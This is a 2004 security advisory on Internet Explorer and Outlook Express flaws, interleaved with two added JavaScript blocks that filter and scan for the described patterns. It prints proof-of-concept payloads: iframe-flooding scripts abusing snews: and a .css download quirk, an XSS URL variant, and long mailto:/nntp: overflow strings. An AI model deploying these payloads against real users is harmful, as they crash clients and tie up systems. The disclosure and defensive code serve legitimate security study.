
IEmultiples.txt

Posted Jan 21, 2004
Authored by Rafel Ivgi | Site theinsider.deep-ice.com

When using the SNEWS protocol, Internet Explorer does not apply its filtering engine and can trigger a buffer overrun in Outlook Express, with possible code execution.

tags | advisory, overflow, code execution, protocol
SHA-256 | b1c8758f7ae810befb59be9d3679bb31b88d48ffc8d5d5c14e2ef342f8769de7

Internet Explorer - Multiple Vulnerabilities

Discovered by Rafel Ivgi, The-Insider.
http://theinsider.deep-ice.com

Every time I read about a vulnerability concerning I.E, I believe more
and more that I.E is the biggest backdoor ever.
After the CONTENT-TYPE: bug that allowed downloading exes as audio
and all the patches, I.E 6 still has parsing problems. I discovered
that, amazingly, with another wonderful Microsoft software, I can
force downloads on users, fake downloaded file extensions and names,
inject scripts into the "blank" file, run a lot of different applications,
cause a lot of errors and see the content of binary files inside I.E,
cause a buffer overflow in Outlook and even D.O.S the system.
Before you read the following text, I believe the most dangerous bug in I.E
is the possibility of actively creating <iframes> or popping up new windows
*without a limit* (only the memory limit). This makes it easy
to create many errors, overflows, and to D.O.S internet users.

*************************************************************************************************************
Internet Explorer & Outlook Express (6.00.2600 - Fully Patched)

Microsoft has inserted a filtering engine inside Internet Explorer. This
engine verifies that only secure, valid and appropriately formed data is
passed on to external applications.
**************************************************
The filtering engine skips a few important checks, such as the "MAILTO:"
protocol. With no filtering, it allows inappropriate data to be sent to the
default mail client.

Example:
mailto:%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaa
aa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%
a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5
%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99
%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%9
8aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%9
9%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%
98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00
%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaa
aaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%0
0%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%
C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%
99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01
%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2
%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e
2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%
00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98

which pops up the following error message: "The default mail client is not
properly installed".
There should be filtering, because there cannot be an email address such as
this one (which is accepted by the I.E plugins filter):

mailto:%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%
01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%
98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5
%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaa
aa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%
e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C
8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e
2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%
a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaa
aaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a
6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5
%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3
%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
a%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaa%
a5%e2%99%a6%e2%99%a3aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaa
**************************************************

This filtering engine also filters Outlook links such as the NNTP and SNTP
protocols. However, the security hole appears when an attacker uses the
SNEWS protocol, which has no filtering at all.

nntp://aaaaaa.com/aaaaa - filtering active! - results in an error message.
sntp://aaaaaaaaaaaaaaa - filtering active! - results in an error message.
snews://aaaaaaaaaaaaa - filtering *inactive!* - results in activation of
Outlook and server injection into Outlook.
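
The filter the advisory describes is applied scheme by scheme, so any scheme it forgot (mailto:, snews:) reaches the external handler unchecked. The following is an added example, not code from the advisory, of what a default-deny hand-off filter looks like: one set of byte-level checks applied to every scheme before a URL is passed to a mail or news client, followed by a per-scheme syntax check. The scheme list, the length limit and the address grammar are assumptions chosen for illustration, not Internet Explorer's actual rules.

```javascript
// Added example, not code from the advisory: a default-deny hand-off filter
// for URLs that a browser would pass to an external mail or news client.
// The scheme list, the length limit and the address grammar are assumptions
// chosen for illustration, not Internet Explorer's actual rules.

// Only these schemes may ever reach an external application. A scheme that is
// not listed is rejected, so a forgotten scheme cannot bypass the checks.
const EXTERNAL_SCHEMES = new Set(["mailto", "nntp", "news", "snews"]);

// Upper bound on the whole URL; real mailto/news links are far shorter.
const MAX_URL_LENGTH = 2048;

// Conservative addressee grammar for mailto: (ASCII local part, dotted host).
const ADDRESS_RE = /^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$/;
// Hostname grammar for news-style URLs.
const HOST_RE = /^[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*$/;

// Decode %XX escapes to raw bytes without decodeURIComponent, which throws on
// byte sequences that are not valid UTF-8; we want the bytes so we can reject them.
function percentDecode(s) {
  const bytes = [];
  for (let i = 0; i < s.length; i++) {
    const hex = s.substr(i + 1, 2);
    if (s[i] === "%" && /^[0-9A-Fa-f]{2}$/.test(hex)) {
      bytes.push(parseInt(hex, 16));
      i += 2;
    } else {
      bytes.push(s.charCodeAt(i));
    }
  }
  return bytes;
}

// Returns { ok: true } or { ok: false, reason }.
function checkExternalUrl(url) {
  if (typeof url !== "string" || url.length === 0) return { ok: false, reason: "empty" };
  if (url.length > MAX_URL_LENGTH) return { ok: false, reason: "too long" };
  const m = /^([A-Za-z][A-Za-z0-9+.-]*):([\s\S]*)$/.exec(url);
  if (!m) return { ok: false, reason: "no scheme" };
  const scheme = m[1].toLowerCase();
  if (!EXTERNAL_SCHEMES.has(scheme)) return { ok: false, reason: "scheme not allowed: " + scheme };

  // The same byte rule for every scheme: printable ASCII only. This catches the
  // NUL (%00), control (%01) and high (%a5, %C7, ...) bytes in the advisory's
  // mailto: sample no matter which handler the URL is aimed at.
  const bytes = percentDecode(m[2]);
  for (const b of bytes) {
    if (b < 0x20 || b > 0x7e) return { ok: false, reason: "non-printable byte 0x" + b.toString(16) };
  }
  const decoded = String.fromCharCode(...bytes);

  // Per-scheme syntax, applied only after the common checks have passed.
  if (scheme === "mailto") {
    const address = decoded.split("?")[0]; // header fields (subject=...) follow '?'
    if (!ADDRESS_RE.test(address)) return { ok: false, reason: "malformed address" };
  } else {
    const n = /^\/\/([^/:]+)(:\d{1,5})?(\/.*)?$/.exec(decoded);
    if (!n || n[1].length > 253 || !HOST_RE.test(n[1])) return { ok: false, reason: "malformed host" };
  }
  return { ok: true };
}
```

Run against the advisory's inputs, the mailto: sample is rejected on its first high byte (0xa5), the three-slash nntp:/// URL on its empty host, and file://http://... on its scheme. A syntactically clean host such as snews://aaaaaaaaaaaaa passes: a syntax filter limits what an external handler receives, it does not limit how often the handler is launched.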

This security hole allows any HTML page/website to open Outlook Express and
inject anything as if it were a valid news server. This becomes a troubling
issue if someone makes a loop that injects a huge number of fake snews
servers: each address remains written in Outlook's news server database and
may cause a crash or waste system resources.
The simplest way to exploit this vulnerability is by XSS (Cross Site
Scripting).

Local example - example.html :
-------------- Cut Here --------------
<script>
var i
for (i=1;i<1000000;i++) {
document.write("\<iframe
src=\"snews://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" + i +
"\"\>\<\/iframe>");
}
document.refresh;
</script>
-------------- Cut Here --------------

Or by XSS:

http://<XSS_VULN_HOST>/<script>var i; for (i=1;i<1000000;i++) {
document.write("\<iframe
src=\"snews://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" + i +
"\"\>\<\/iframe>"); } document.refresh; </script>

This issue also creates a buffer overflow within Outlook Express at offset
0x00dc735, which closes Outlook Express, slows down the system and may even
halt low-memory machines.
This buffer overflow in Outlook Express is HIGHLY DANGEROUS: it can cause
remote arbitrary command execution on almost every XP machine on earth.

Temporary Fix For This Problem: the first time Outlook is run by the URL
"snews://aaaaaaaaaaaa", it asks the user whether Outlook should be the
default "SNEWS" client. Choosing No solves the problem for now.
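
example.html above launches the news client once per iframe, up to a million times; no URL syntax filter can see that, it takes a page-level check. The following is an added example, not part of the advisory, of a scan that a mail gateway or web proxy could run over HTML: it flags frames whose src targets an external protocol handler and blocks pages that carry more than one such frame or that generate them from a script loop. It is regex-based so it runs without a DOM; the scheme list, the one-frame threshold and the sample pages are assumptions.

```javascript
// Added example, not code from the advisory: a page-level scan, as a mail
// gateway or web proxy could run it, for HTML that hands frames to an external
// protocol handler. The scheme list and the one-frame threshold are assumptions.

const HANDLER_SCHEMES = ["mailto", "nntp", "news", "snews"];

function schemeOf(url) {
  const m = /^([A-Za-z][A-Za-z0-9+.-]*):/.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// Collect findings: static frames whose src targets a handler scheme, and
// scripts that both mention such a scheme and write frames from a loop
// (the shape of example.html, where document.write emits an <iframe> per
// iteration). Regexes are created per call so their lastIndex state is fresh.
function scanHtml(html) {
  const findings = [];
  const frameSrc = /<(?:iframe|frame)\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  const script = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  const schemeMention = new RegExp("\\b(" + HANDLER_SCHEMES.join("|") + "):", "gi");
  let m;
  while ((m = frameSrc.exec(html)) !== null) {
    const s = schemeOf(m[1]);
    if (s && HANDLER_SCHEMES.includes(s)) findings.push({ kind: "frame", scheme: s, value: m[1] });
  }
  while ((m = script.exec(html)) !== null) {
    const body = m[1];
    const schemes = new Set();
    let sm;
    schemeMention.lastIndex = 0;
    while ((sm = schemeMention.exec(body)) !== null) schemes.add(sm[1].toLowerCase());
    if (schemes.size === 0) continue;
    const writesFrames = /document\.write\s*\(/.test(body) && /iframe/i.test(body);
    const looped = /\b(?:for|while)\s*\(/.test(body);
    findings.push({
      kind: looped && writesFrames ? "frame-loop" : "script",
      scheme: [...schemes].sort().join(","),
      value: looped && writesFrames ? "document.write of frames inside a loop" : "handler scheme referenced",
    });
  }
  return findings;
}

// Policy (assumption): one static frame to a handler is unusual but may be
// legitimate, so it is queued for review; more than one, or any script loop
// that generates them, is blocked.
function classify(html, maxFrames = 1) {
  const findings = scanHtml(html);
  const frames = findings.filter((f) => f.kind === "frame").length;
  const loops = findings.filter((f) => f.kind === "frame-loop").length;
  let verdict = "allow";
  if (loops > 0 || frames > maxFrames) verdict = "block";
  else if (findings.length > 0) verdict = "review";
  return { verdict, frames, loops, findings };
}

// Constructed sample inputs (not captured from the wild). FLOOD_PAGE mirrors
// the structure of example.html above.
const FLOOD_PAGE =
  "<html><body><script>\nvar i\nfor (i=1;i<1000000;i++) {\n" +
  'document.write("\\<iframe src=\\"snews://aaaaaaaaaaaaaaaaaaaaaa" + i + "\\"\\>\\<\\/iframe>");\n' +
  "}\n</script></body></html>";
const ONE_FRAME = '<html><body><iframe src="snews://news.example.net/"></iframe></body></html>';
const BENIGN = '<html><body><p>Write to <a href="mailto:help@example.com">support</a>.</p></body></html>';
```

The scan deliberately keys on how many times a handler would be launched rather than on the target address: the advisory's snews://aaaaaaaaaaaaa is a well-formed hostname, so the damage comes from the repetition, not the syntax.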
*************************************************************************************************************
Disable Backspace In I.E

*Manually type* in the I.E address bar "http://www.yourhost.com/#"
and press Enter.
No backspace!

No special danger except abusing unsuspecting users.
*************************************************************************************************************

I.E automatically opens a download box for a file when a file with the same
name plus a ".css" extension exists in that folder.
For example:
http://<host>/styles

This causes an I.E download box that tries to download the file "styles".
***This happens only because a file named "styles.css" is located in that
folder.***

Exploit Example - example2.html :
-------------- Cut Here --------------
<script>
var i
for (i=1;i<1000;i++) {
document.write("\<iframe src=\"http://<host>/styles\"\>\<\/iframe>");
}
document.refresh;
</script>
-------------- Cut Here --------------

This will execute FrontPage and start referring the ".css" to it. For each
file download, 2 message boxes open: 1 is the download window and 2 is the
"can't find" error message, which reveals/enumerates the path of all local
Temporary Internet Files folders. This quick memory overload fills up
FrontPage's memory, after which it opens the ".css" files in Notepad. After
it is done with Notepad's memory it tries opening the files in "Open With",
which is done by "rundll32.exe". At this point "rundll32.exe" reaches an
out-of-memory overflow and raises a message box for each file download
attempt.
*************************************************************************************************************
I.E Long Parameter Errors
nntp:///62.219.131.195/a=?b=?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaafile://http://ftp://www.tripod.com
This can be tested with all of the protocols nntp://, sntp://, ldap:// and ftp://.
*************************************************************************************************************

"Things that are unlikeable, are NOT impossible."